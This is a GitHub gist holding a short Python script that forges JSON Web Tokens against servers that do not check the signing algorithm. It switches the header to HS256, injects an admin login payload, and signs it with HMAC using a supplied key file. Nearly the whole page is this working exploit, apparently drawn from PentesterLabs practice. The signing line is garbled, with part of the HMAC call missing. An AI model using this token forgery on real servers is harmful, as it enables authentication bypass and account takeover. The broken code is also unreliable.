Skip to content

Instantly share code, notes, and snippets.

Created August 4, 2021 09:08
What would you like to do?
A simple token crafter script to use when the server not verifying jwt algorithm.
import requests
import base64
import hmac
import hashlib
# Controls
keyFilePath = "KEY GOES HERE"
tokenFromApplication = "TOKEN GOES HERE"
# Read the key
key = open(keyFilePath, "rb").read()
header, payload, signature = tokenFromApplication.split(".")
# {STEP1} Create a malicious payload (Ex: {"username": "admin"})
payload = base64.urlsafe_b64encode(b'{"login":"admin"}').decode("utf-8").strip("=")
# {STEP2} Set the header algorithm to HS256
header = base64.urlsafe_b64encode(b'{"typ":"JWT","alg":"HS256"}').decode("utf-8").strip("=")
# {STEP3} Concatenate the header + payload which makes DATA potion of the token
data = header + "." + payload
# {STEP4} Sign the DATA against the key using the HMAC algorithm
# HMAC sign solution found from =>; Use the digest() instead of hexdigest() solution from PentesterLabs
new_signature = base64.urlsafe_b64encode(, bytes(data, encoding='utf8'), hashlib.sha256).digest()).decode("utf-8").strip("=")
print("Crafted Token => ", data + "." + new_signature)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment